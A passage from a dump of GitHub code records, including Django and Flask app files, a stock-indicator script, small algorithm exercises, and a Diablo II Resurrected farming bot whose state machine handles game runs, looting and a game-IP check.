o resto é: {}\".format(di, e, r))\n","repo_name":"GigioFu/PycharmProjects","sub_path":"Curso_em_Video/Exercícios de AulaM1/operadoes_aritmedicos.py","file_name":"operadoes_aritmedicos.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16474889837","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Task(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=\"Created By\")\n title = models.CharField(max_length=100, verbose_name=\"Title\")\n completed = models.BooleanField(default=False, verbose_name=\"Completed\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.title","repo_name":"asyraphile/todolist","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6162530052","text":"from typing import List\n\nfrom src.repositories.telegram_chat_ids_repository.base import TelegramChatIdsRepositoryABC\n\n\nclass TelegramChatIdsRepositoryLocal(TelegramChatIdsRepositoryABC):\n _filename: str\n\n def __init__(self, filename: str):\n self._filename = filename\n\n async def get_all_chats(self) -> List[str]:\n with open(self._filename, \"r\") as f:\n line = f.readline()\n return line.split(\",\")\n\n async def add_chat(self, chat_id: str):\n with open(self._filename, \"a\") as f:\n f.write(f\"{chat_id},\")\n\n async def remove_chat(self, chat_id: str):\n chats = await self.get_all_chats()\n filtered = filter(lambda id_: id_ != chat_id, chats)\n self.set_chats(list(filtered))\n\n def set_chats(self, chat_ids: List[str]):\n with open(self._filename, \"w\") as f:\n f.write(\",\".join(chat_ids))\n\n async def is_chat_id_subscribed(self, chat_id: str) -> bool:\n with open(self._filename, \"r\") as f:\n ids = f.readline().split(\",\")\n return chat_id in ids\n","repo_name":"vdor/tgn-water-bot","sub_path":"src/repositories/telegram_chat_ids_repository/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74166072427","text":"import baostock as bs\nimport pandas as 
pd\nimport talib as ta\nimport datetime\nimport numpy as np\nfrom stock_pandas import StockDataFrame\n\n\ncode = 'sz.002241'\nstart_date = '2000-01-01'\nend_date = '2022-03-25'\n\n# global_dateday = None\nglobal_dateday = '2022-04-07'\nlg = bs.login()\n\nparams = []\nkdj_params = '9,3,3'\nwith open('input_params.txt', 'r') as f:\n    code_list = f.readlines()\n    for index, item in enumerate(code_list):\n        item = item.strip()\n        if index == 2:\n            kdj_params = item\n        item = item.split(',')\n        \n        params += [int(i) for i in item]\n\n    print(params)\n\ndef get_data(code, end_date, start_date='2000-01-01'):\n    #Step1: fetch the data\n    print(code)\n    rs = bs.query_history_k_data_plus(code,\n        \"date,code,open,high,low,close,preclose,volume,amount,turn\",\n        start_date=start_date, end_date=end_date, frequency=\"d\", adjustflag='2')# note: adjustflag='2' selects forward-adjusted prices\n    data_list = []\n    while (rs.error_code == '0') & rs.next():\n        data_list.append(rs.get_row_data())\n    df = pd.DataFrame(data_list, columns=rs.fields)\n    df[['open', 'high', 'low', 'close', 'volume']] = df[['open', 'high', 'low', 'close', 'volume']].astype(\n        'float64')\n    df = df.rename(columns={'date': 'datetime'})\n    df.index = pd.DatetimeIndex(df['datetime'])\n    # bs.logout()\n    import time\n    time_start=time.time()\n    \n    #Step2: compute MACD with Pandas\n    \n    short_ema = df['close'].ewm(span=params[0]).mean()\n    long_ema = df['close'].ewm(span=params[1]).mean()\n    df.loc[:, 'DIFF'] = short_ema - long_ema\n    df.loc[:, 'DEA'] = df['DIFF'].ewm(span=params[2]).mean()\n    df.loc[:, 'MACD'] = 2 * (df['DIFF'] - df['DEA'])\n    df[\"rsi_6\"] = ta.RSI(df['close'], timeperiod=params[3])\n    df[\"rsi_12\"] = ta.RSI(df['close'], timeperiod=params[4])\n    df[\"rsi_24\"] = ta.RSI(df['close'], timeperiod=params[5])\n\n    # low_list = df['low'].rolling(9, min_periods=9).min()\n    # low_list.fillna(value=df['low'].expanding().min(), inplace=True)\n    # high_list = df['high'].rolling(9, min_periods=9).max()\n    # high_list.fillna(value = df['high'].expanding().max(), inplace=True)\n    # rsv = (df['close'] - low_list) / (high_list - low_list) * 100\n    # df['k'] = pd.DataFrame(rsv).ewm(com=2).mean()\n    # df['d'] = df['k'].ewm(com=2).mean()\n    # df['j'] = 3 * df['k'] - 2 * df['d']\n    time_end=time.time()\n    format = '%Y-%m-%d'\n    dateday = datetime.date.today().strftime(format)\n    if global_dateday:\n        dateday = global_dateday\n\n    stock = StockDataFrame(df)\n    kdj = stock[[f'kdj.k:{kdj_params}', f'kdj.d:{kdj_params}', f'kdj.j:{kdj_params}']]\n    df['k'] = kdj.loc[dateday][0]\n    df['d'] = kdj.loc[dateday][1]\n    df['j'] = kdj.loc[dateday][2]\n\n    # import ipdb;ipdb.set_trace()\n\n    df_filter = df[df['datetime']==dateday]\n    # import ipdb;ipdb.set_trace()\n    return deal_df(df_filter)\n\n\ndef deal_df(df):\n    df_new = pd.DataFrame()\n    df_new['时间'] = df['datetime']\n    df_new['股票代码'] = df['code']\n    df_new['当前股价'] = df['close']\n    df_new['开盘股价'] = df['open']\n    df_new['涨跌幅'] = (df['close'] - df['preclose'].astype(float) ) / df['preclose'].astype(float) \n    df_new['收盘股价'] = df['preclose']\n    df_new['最高价'] = df['high']\n    df_new['最低价'] = df['low']\n    df_new['成交量'] = df['volume']\n    df_new['成交额'] = df['amount']\n    df_new['换手(实)'] = df['turn']\n    df_new['MACD'] = df['MACD']\n    df_new['DIFF'] = df['DIFF']\n    df_new['DEA'] = df['DEA']\n    df_new['rsi_6'] = df['rsi_6']\n    df_new['rsi_12'] = df['rsi_12']\n    df_new['rsi_24'] = df['rsi_24']\n    df_new['k'] = df['k']\n    df_new['d'] = df['d']\n    df_new['j'] = df['j']\n    # import ipdb;ipdb.set_trace()\n    return df_new\nif __name__ == '__main__':\n    get_data(code, end_date, start_date)
","repo_name":"maiff/stockSpider","sub_path":"zhibiao.py","file_name":"zhibiao.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"1749415418","text":"\"\"\"\nTest function to pull messages from pub/sub topic\n\"\"\"\n\nimport os\nimport json\nfrom google.cloud import pubsub_v1\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\ndotenv_path = Path(__file__).resolve().parents[1] / '.env'\nload_dotenv(dotenv_path=dotenv_path)\n\n\nPROJECT_ID = os.getenv(\"PROJECT_ID\")\nSUB_ID = os.getenv('BACKEND_PULL_SUBSCRIBER_ID')\n\nsubscriber = pubsub_v1.SubscriberClient()\n\nsubscriber_path = subscriber.subscription_path(PROJECT_ID, SUB_ID)\n\ndef receive():\n    response = subscriber.pull(\n        request={\n            'subscription': subscriber_path,\n            'max_messages': 1,\n        }\n    )\n\n    # acknowledge reception\n    msg = response.received_messages[0]\n    ack_id = msg.ack_id\n    subscriber.acknowledge(\n        request={\n            'subscription': subscriber_path,\n            'ack_ids': [ack_id],\n        }\n    )\n    data = json.loads(msg.message.data)\n    return data\n\nif __name__ == '__main__':\n    print(receive())","repo_name":"vykuang/mlops-zoomcamp","sub_path":"w4-deployment/stream/backend/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43745531333","text":"#!/usr/bin/python3\n\n# -*- coding: utf-8 -*-\n\nfrom Prima_algorythm import *\n\n\ndef get_min(R, U):\n    rm = (INF, -1, -1)\n    for v in U:\n        rr = min(R, key=lambda x: x[0] if (x[1] == v or x[2] == v) and (x[1] not in U or x[2] not in U) else INF)\n        if rm[0] > rr[0]:\n            rm = rr\n\n    return rm\n\n","repo_name":"cherrydan/python-for-work","sub_path":"Algorythms by selfedu/Prima_algorythm/get_min.py","file_name":"get_min.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21908323836","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('pray', '0002_pray_pray_time'),\n    ]\n\n    operations = [\n        migrations.RenameField(\n            model_name='attendance',\n            old_name='joined',\n            new_name='joined_afternoon',\n        ),\n        migrations.RemoveField(\n            model_name='pray',\n            name='pray_time',\n        ),\n        migrations.AddField(\n            model_name='attendance',\n            name='joined_morning',\n            field=models.BooleanField(default=False),\n        ),\n    ]\n","repo_name":"wanspaul/holyhappy","sub_path":"pray/migrations/0003_auto_20170512_1428.py","file_name":"0003_auto_20170512_1428.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72434208106","text":"n, m = [int(i) for i in input().split(' ')]\na = [0] * (n + 1)\ns = input().split(' ')\nfor i in range(n):\n    a[i + 1] = int(s[i])\n# reading the list this way gets RE (runtime error)\n# a = [int(i) for i in input().split(' ')]\n#\n# solution 1\n# ans1, ans2, ans3 = 0, 0, 0\n#\n# for i in range(n):\n#     for j in range(i, n):\n#         a_sum = 0\n#         for k in range(i, j+1):\n#             a_sum += a[k]\n#\n#         if a_sum > ans3 and a_sum <= m:\n#             ans1 = i\n#             ans2 = j\n#             ans3 = a_sum\n# print(ans1+1,ans2,ans3)\n\n# solution 2 -- using a queue; C++ can get full marks, Python only reaches 60\ni, j, ansi, ansj = 1, 1, 1, 1\nansmax = 0\na_sum = 0\nwhile i <= n:\n    while j <= n and a_sum + a[j] <= m:\n        a_sum = a_sum + a[j]\n        j += 1\n    if a_sum <= m and a_sum > 
ansmax:\n ansmax = a_sum\n ansi = i\n ansj = j - 1\n a_sum -= a[i]\n i += 1\n\nprint(ansi, ansj, ansmax)\n","repo_name":"jellier/HetaoHomeWork","sub_path":"算法练习/P5745_区间最大和.py","file_name":"P5745_区间最大和.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1499831839","text":"from transitions import Machine\nimport time\nimport keyboard\nimport time\nimport os\nimport random\nimport cv2\nfrom copy import copy\nfrom typing import Union\nfrom collections import OrderedDict\n\nfrom utils.misc import wait\nfrom game_stats import GameStats\nfrom logger import Logger\nfrom config import Config\nfrom screen import Screen\nfrom template_finder import TemplateFinder\nfrom char import IChar\nfrom item import ItemFinder\nfrom item.pickit import PickIt\nfrom ui import UiManager\nfrom ui import BeltManager\nfrom pather import Pather, Location\nfrom npc_manager import NpcManager\nfrom health_manager import HealthManager\nfrom death_manager import DeathManager\nfrom char.sorceress import LightSorc, BlizzSorc, NovaSorc\nfrom char.trapsin import Trapsin\nfrom char.hammerdin import Hammerdin\nfrom char.barbarian import Barbarian\nfrom char.necro import Necro\nfrom char.basic import Basic\nfrom char.basic_ranged import Basic_Ranged\n\nfrom run import Pindle, ShenkEld, Trav, Nihlatak, Arcane, Diablo, LowerKurast\nfrom town import TownManager, A1, A2, A3, A4, A5\n\n# Added for dclone ip hunt\nfrom messenger import Messenger\nfrom utils.dclone_ip import get_d2r_game_ip\n\nclass Bot:\n def __init__(self, screen: Screen, game_stats: GameStats, template_finder: TemplateFinder, pick_corpse: bool = False):\n self._screen = screen\n self._game_stats = game_stats\n self._messenger = Messenger()\n self._config = Config()\n self._template_finder = template_finder\n self._item_finder = ItemFinder()\n self._ui_manager = UiManager(self._screen, self._template_finder, self._game_stats)\n self._belt_manager = BeltManager(self._screen, self._template_finder)\n self._pather = Pather(self._screen, self._template_finder)\n self._pickit = PickIt(self._screen, self._item_finder, self._ui_manager, self._belt_manager)\n\n # Create Character\n if self._config.char[\"type\"] in [\"sorceress\", \"light_sorc\"]:\n self._char: IChar = LightSorc(self._config.light_sorc, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"blizz_sorc\":\n self._char: IChar = BlizzSorc(self._config.blizz_sorc, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"nova_sorc\":\n self._char: IChar = NovaSorc(self._config.nova_sorc, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"hammerdin\":\n self._char: IChar = Hammerdin(self._config.hammerdin, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"trapsin\":\n self._char: IChar = Trapsin(self._config.trapsin, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"barbarian\":\n self._char: IChar = Barbarian(self._config.barbarian, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"necro\":\n self._char: IChar = Necro(self._config.necro, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"basic\":\n self._char: IChar = 
Basic(self._config.basic, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"basic_ranged\":\n self._char: IChar = Basic_Ranged(self._config.basic_ranged, self._screen, self._template_finder, self._ui_manager, self._pather)\n else:\n Logger.error(f'{self._config.char[\"type\"]} is not supported! Closing down bot.')\n os._exit(1)\n\n # Create Town Manager\n npc_manager = NpcManager(screen, self._template_finder)\n a5 = A5(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a4 = A4(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a3 = A3(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a2 = A2(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a1 = A1(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n self._town_manager = TownManager(self._template_finder, self._ui_manager, self._item_finder, a1, a2, a3, a4, a5)\n self._route_config = self._config.routes\n self._route_order = self._config.routes_order\n\n # Create runs\n if self._route_config[\"run_shenk\"] and not self._route_config[\"run_eldritch\"]:\n Logger.error(\"Running shenk without eldtritch is not supported. Either run none or both\")\n os._exit(1)\n self._do_runs = {\n \"run_trav\": self._route_config[\"run_trav\"],\n \"run_pindle\": self._route_config[\"run_pindle\"],\n \"run_shenk\": self._route_config[\"run_shenk\"] or self._route_config[\"run_eldritch\"],\n \"run_nihlatak\": self._route_config[\"run_nihlatak\"],\n \"run_arcane\": self._route_config[\"run_arcane\"],\n \"run_diablo\": self._route_config[\"run_diablo\"],\n \"run_lowerkurast\": self._route_config[\"run_lowerkurast\"],\n }\n # Adapt order to the config\n self._do_runs = OrderedDict((k, self._do_runs[k]) for k in self._route_order if k in self._do_runs and self._do_runs[k])\n self._do_runs_reset = copy(self._do_runs)\n Logger.info(f\"Doing runs: {self._do_runs_reset.keys()}\")\n if self._config.general[\"randomize_runs\"]:\n self.shuffle_runs()\n self._pindle = Pindle(self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._shenk = ShenkEld(self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._trav = Trav(self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._nihlatak = Nihlatak(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._arcane = Arcane(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._diablo = Diablo(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._lowerkurast = LowerKurast(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n\n # Create member variables\n self._pick_corpse = pick_corpse\n self._picked_up_items = False\n self._curr_loc: Union[bool, Location] = None\n self._tps_left = 10 # assume half full tp book\n self._pre_buffed = False\n self._stopping = False\n self._pausing = False\n self._current_threads = []\n self._no_stash_counter = 0\n self._ran_no_pickup = False\n\n # Create State Machine\n self._states=['hero_selection', 'town', 'pindle', 'shenk', 'trav', 'nihlatak', 'arcane', 'diablo','lowerkurast']\n 
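# each transition entry below wires a trigger to its allowed source state(s),\n        # a destination state, and a 'before' callback that runs ahead of the change\n        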
self._transitions = [\n            { 'trigger': 'create_game', 'source': 'hero_selection', 'dest': 'town', 'before': \"on_create_game\"},\n            # Tasks within town\n            { 'trigger': 'maintenance', 'source': 'town', 'dest': 'town', 'before': \"on_maintenance\"},\n            # Different runs\n            { 'trigger': 'run_pindle', 'source': 'town', 'dest': 'pindle', 'before': \"on_run_pindle\"},\n            { 'trigger': 'run_shenk', 'source': 'town', 'dest': 'shenk', 'before': \"on_run_shenk\"},\n            { 'trigger': 'run_trav', 'source': 'town', 'dest': 'trav', 'before': \"on_run_trav\"},\n            { 'trigger': 'run_nihlatak', 'source': 'town', 'dest': 'nihlatak', 'before': \"on_run_nihlatak\"},\n            { 'trigger': 'run_arcane', 'source': 'town', 'dest': 'arcane', 'before': \"on_run_arcane\"},\n            { 'trigger': 'run_diablo', 'source': 'town', 'dest': 'diablo', 'before': \"on_run_diablo\"},\n            { 'trigger': 'run_lowerkurast', 'source': 'town', 'dest': 'lowerkurast', 'before': \"on_run_lowerkurast\"},\n            # End run / game\n            { 'trigger': 'end_run', 'source': ['shenk', 'pindle', 'nihlatak', 'trav', 'arcane', 'diablo','lowerkurast'], 'dest': 'town', 'before': \"on_end_run\"},\n            { 'trigger': 'end_game', 'source': ['town', 'shenk', 'pindle', 'nihlatak', 'trav', 'arcane', 'diablo','lowerkurast','end_run'], 'dest': 'hero_selection', 'before': \"on_end_game\"},\n        ]\n        self.machine = Machine(model=self, states=self._states, initial=\"hero_selection\", transitions=self._transitions, queued=True)\n\n    def draw_graph(self):\n        # Draw the whole graph, graphviz binaries must be installed and added to path for this!\n        from transitions.extensions import GraphMachine\n        self.machine = GraphMachine(model=self, states=self._states, initial=\"hero_selection\", transitions=self._transitions, queued=True)\n        self.machine.get_graph().draw('my_state_diagram.png', prog='dot')\n\n    def get_belt_manager(self) -> BeltManager:\n        return self._belt_manager\n\n    def get_curr_location(self):\n        return self._curr_loc\n\n    def start(self):\n        self.trigger('create_game')\n\n    def stop(self):\n        self._stopping = True\n\n    def toggle_pause(self):\n        self._pausing = not self._pausing\n        if self._pausing:\n            Logger.info(f\"Pause at next state change...\")\n        else:\n            Logger.info(f\"Resume\")\n            self._game_stats.resume_timer()\n\n    def trigger_or_stop(self, name: str, **kwargs):\n        if self._pausing:\n            Logger.info(f\"{self._config.general['name']} is now pausing\")\n            self._game_stats.pause_timer()\n        while self._pausing:\n            time.sleep(0.2)\n        if not self._stopping:\n            self.trigger(name, **kwargs)\n\n    def current_game_length(self):\n        return self._game_stats.get_current_game_length()\n\n    def shuffle_runs(self):\n        tmp = list(self._do_runs.items())\n        random.shuffle(tmp)\n        self._do_runs = OrderedDict(tmp)\n\n    def is_last_run(self):\n        found_unfinished_run = False\n        for key in self._do_runs:\n            if self._do_runs[key]:\n                found_unfinished_run = True\n                break\n        return not found_unfinished_run\n\n    def on_create_game(self):\n        keyboard.release(self._config.char[\"stand_still\"])\n        # Start a game from hero selection\n        self._game_stats.log_start_game()\n        self._template_finder.search_and_wait([\"MAIN_MENU_TOP_LEFT\",\"MAIN_MENU_TOP_LEFT_DARK\"], roi=self._config.ui_roi[\"main_menu_top_left\"])\n        if not self._ui_manager.start_game(): return\n        self._curr_loc = self._town_manager.wait_for_town_spawn()\n\n        # Check for the current game ip and pause if we are able to obtain the hot ip\n        if self._config.dclone[\"region_ips\"] != \"\" and self._config.dclone[\"dclone_hotip\"] != \"\":\n            cur_game_ip = get_d2r_game_ip()\n            hot_ip = 
self._config.dclone[\"dclone_hotip\"]\n Logger.debug(f\"Current Game IP: {cur_game_ip} and HOTIP: {hot_ip}\")\n if hot_ip == cur_game_ip:\n self._messenger.send_message(f\"Dclone IP Found on IP: {cur_game_ip}\")\n print(\"Press Enter\")\n input()\n os._exit(1)\n else:\n Logger.info(f\"Please Enter the region ip and hot ip on config to use\")\n\n # Run /nopickup command to avoid picking up stuff on accident\n if not self._ran_no_pickup:\n self._ran_no_pickup = True\n if self._ui_manager.enable_no_pickup():\n Logger.info(\"Activated /nopickup\")\n else:\n Logger.error(\"Failed to detect if /nopickup command was applied or not\")\n self.trigger_or_stop(\"maintenance\")\n\n def on_maintenance(self):\n # Handle picking up corpse in case of death\n if self._pick_corpse:\n self._pick_corpse = False\n time.sleep(1.6)\n DeathManager.pick_up_corpse(self._screen)\n wait(1.2, 1.5)\n self._belt_manager.fill_up_belt_from_inventory(self._config.char[\"num_loot_columns\"])\n wait(0.5)\n # Look at belt to figure out how many pots need to be picked up\n self._belt_manager.update_pot_needs()\n\n # Check if should need some healing\n img = self._screen.grab()\n buy_pots = self._belt_manager.should_buy_pots()\n if HealthManager.get_health(img) < 0.6 or HealthManager.get_mana(img) < 0.2 or buy_pots:\n if buy_pots:\n Logger.info(\"Buy pots at next possible Vendor\")\n pot_needs = self._belt_manager.get_pot_needs()\n self._curr_loc = self._town_manager.buy_pots(self._curr_loc, pot_needs[\"health\"], pot_needs[\"mana\"])\n wait(0.5, 0.8)\n self._belt_manager.update_pot_needs()\n # TODO: Remove this, currently workaround cause too lazy to add all the pathes from MALAH\n if self._curr_loc == Location.A5_MALAH:\n if self._pather.traverse_nodes((Location.A5_MALAH, Location.A5_TOWN_START), self._char, force_move=True):\n self._curr_loc = Location.A5_TOWN_START\n else:\n self._curr_loc = False\n else:\n Logger.info(\"Healing at next possible Vendor\")\n self._curr_loc = self._town_manager.heal(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n\n # Check if we should force stash (e.g. when picking up items by accident or after failed runs or chicken/death)\n force_stash = False\n self._no_stash_counter += 1\n if not self._picked_up_items and (self._no_stash_counter > 4 or self._pick_corpse):\n self._no_stash_counter = 0\n force_stash = self._ui_manager.should_stash(self._config.char[\"num_loot_columns\"])\n # Stash stuff, either when item was picked up or after X runs without stashing because of unwanted loot in inventory\n if self._picked_up_items or force_stash:\n if self._config.char[\"id_items\"]:\n Logger.info(\"Identifying items\")\n self._curr_loc = self._town_manager.identify(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n Logger.info(\"Stashing items\")\n self._curr_loc = self._town_manager.stash(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n self._no_stash_counter = 0\n self._picked_up_items = False\n wait(1.0)\n\n # Check if we are out of tps or need repairing\n need_repair = self._ui_manager.repair_needed()\n if self._tps_left < random.randint(3, 5) or need_repair or self._config.char[\"always_repair\"]:\n if need_repair: Logger.info(\"Repair needed. 
Gear is about to break\")\n else: Logger.info(\"Repairing and buying TPs at next Vendor\")\n self._curr_loc = self._town_manager.repair_and_fill_tps(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n self._tps_left = 20\n wait(1.0)\n\n # Check if merc needs to be revived\n merc_alive = self._template_finder.search([\"MERC_A2\",\"MERC_A1\",\"MERC_A5\",\"MERC_A3\"], self._screen.grab(), threshold=0.9, roi=self._config.ui_roi[\"merc_icon\"]).valid\n if not merc_alive and self._config.char[\"use_merc\"]:\n Logger.info(\"Resurrect merc\")\n self._game_stats.log_merc_death()\n self._curr_loc = self._town_manager.resurrect(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n\n # Start a new run\n started_run = False\n for key in self._do_runs:\n if self._do_runs[key]:\n self.trigger_or_stop(key)\n started_run = True\n break\n if not started_run:\n self.trigger_or_stop(\"end_game\")\n\n def on_end_game(self, failed: bool = False):\n if self._config.general[\"info_screenshots\"] and failed:\n cv2.imwrite(\"./info_screenshots/info_failed_game_\" + time.strftime(\"%Y%m%d_%H%M%S\") + \".png\", self._screen.grab())\n self._curr_loc = False\n self._pre_buffed = False\n self._ui_manager.save_and_exit()\n self._game_stats.log_end_game(failed=failed)\n self._do_runs = copy(self._do_runs_reset)\n if self._config.general[\"randomize_runs\"]:\n self.shuffle_runs()\n wait(0.2, 0.5)\n self.trigger_or_stop(\"create_game\")\n\n def on_end_run(self):\n if not self._config.char[\"pre_buff_every_run\"]:\n self._pre_buffed = True\n success = self._char.tp_town()\n if success:\n self._tps_left -= 1\n self._curr_loc = self._town_manager.wait_for_tp(self._curr_loc)\n if self._curr_loc:\n return self.trigger_or_stop(\"maintenance\")\n if not self._ui_manager.has_tps():\n self._tps_left = 0\n self.trigger_or_stop(\"end_game\", failed=True)\n\n # All the runs go here\n # ==================================\n def _ending_run_helper(self, res: Union[bool, tuple[Location, bool]]):\n # either fill member variables with result data or mark run as failed\n failed_run = True\n if res:\n failed_run = False\n self._curr_loc, self._picked_up_items = res\n # in case its the last run or the run was failed, end game, otherwise move to next run\n if self.is_last_run() or failed_run:\n if failed_run:\n self._no_stash_counter = 10 # this will force a check if we should stash on next game\n self.trigger_or_stop(\"end_game\", failed=failed_run)\n else:\n self.trigger_or_stop(\"end_run\")\n\n def on_run_pindle(self):\n res = False\n self._do_runs[\"run_pindle\"] = False\n self._game_stats.update_location(\"Pin\" if self._config.general['discord_status_condensed'] else \"Pindle\")\n self._curr_loc = self._pindle.approach(self._curr_loc)\n if self._curr_loc:\n res = self._pindle.battle(not self._pre_buffed)\n self._ending_run_helper(res)\n\n def on_run_shenk(self):\n res = False\n self._do_runs[\"run_shenk\"] = False\n self._curr_loc = self._shenk.approach(self._curr_loc)\n if self._curr_loc:\n res = self._shenk.battle(self._route_config[\"run_shenk\"], not self._pre_buffed, self._game_stats)\n self._ending_run_helper(res)\n\n def on_run_trav(self):\n res = False\n self._do_runs[\"run_trav\"] = False\n self._game_stats.update_location(\"Trav\" if self._config.general['discord_status_condensed'] else \"Travincal\")\n self._curr_loc = self._trav.approach(self._curr_loc)\n if self._curr_loc:\n res = self._trav.battle(not self._pre_buffed)\n 
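# hand the battle result to the shared helper, which records the run outcome\n            # and decides between triggering 'end_run' and 'end_game'\n            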
self._ending_run_helper(res)\n\n    def on_run_nihlatak(self):\n        res = False\n        self._do_runs[\"run_nihlatak\"] = False\n        self._game_stats.update_location(\"Nihl\" if self._config.general['discord_status_condensed'] else \"Nihlatak\")\n        self._curr_loc = self._nihlatak.approach(self._curr_loc)\n        if self._curr_loc:\n            res = self._nihlatak.battle(not self._pre_buffed)\n        self._ending_run_helper(res)\n\n    def on_run_arcane(self):\n        res = False\n        self._do_runs[\"run_arcane\"] = False\n        self._game_stats.update_location(\"Arc\" if self._config.general['discord_status_condensed'] else \"Arcane\")\n        self._curr_loc = self._arcane.approach(self._curr_loc)\n        if self._curr_loc:\n            res = self._arcane.battle(not self._pre_buffed)\n            self._tps_left -= self._arcane.used_tps\n        self._ending_run_helper(res)\n    \n    def on_run_diablo(self):\n        res = False\n        self._do_runs[\"run_diablo\"] = False\n        self._game_stats.update_location(\"Dia\" if self._config.general['discord_status_condensed'] else \"Diablo\")\n        self._curr_loc = self._diablo.approach(self._curr_loc)\n        if self._curr_loc:\n            res = self._diablo.battle(not self._pre_buffed)\n            self._tps_left -= 1 # we use one tp at pentagram for calibration\n        self._ending_run_helper(res)\n\n    def on_run_lowerkurast(self):\n        res = False\n        self._do_runs[\"run_lowerkurast\"] = False\n        self._game_stats.update_location(\"LK\" if self._config.general['discord_status_condensed'] else \"LowerKurast\")\n        self._curr_loc = self._lowerkurast.approach(self._curr_loc)\n        if self._curr_loc:\n            res = self._lowerkurast.battle(not self._pre_buffed)\n            self._tps_left -= self._lowerkurast.used_tps\n        self._ending_run_helper(res)","repo_name":"jagarop/botty-memread_lk","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":21105,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"13043095437","text":"from api.note import note_bp\nfrom flask import abort, jsonify, request\nfrom jwtauth import verify_jwt\nfrom models import Note\n\n\n@note_bp.route(\"/list\", methods=[\"GET\"])\ndef noteList():\n    # token validation\n    header_auth = request.headers.get(\"Authorization\")\n    if header_auth is None:\n        abort(401, description=\"Unauthorized.\")\n        return\n    token = header_auth[7:]  # strip the \"Bearer \" prefix\n    payload = verify_jwt(token)\n    if payload is None:\n        abort(401, description=\"Invalid Token.\")\n        return\n    userID = payload[\"uid\"]\n\n    # database operation\n    try:\n        all_note = Note.query.filter_by(userID=userID).all()\n    except Exception as e:\n        abort(500, description=f\"Database Operation Error. {e}\")\n        return\n\n    # data processing\n    try:\n        res = []\n        for note in all_note:\n            res.append({\n                \"id\": note.id,\n                \"title\": note.title,\n                \"content\": note.content,\n                \"date\": note.date,\n                \"isStared\": note.isStared,\n            })\n        return jsonify({\"data\": res, \"status\": 0, \"message\": \"OK\"})\n    except Exception as e:\n        abort(500, description=f\"Process Data Error. 
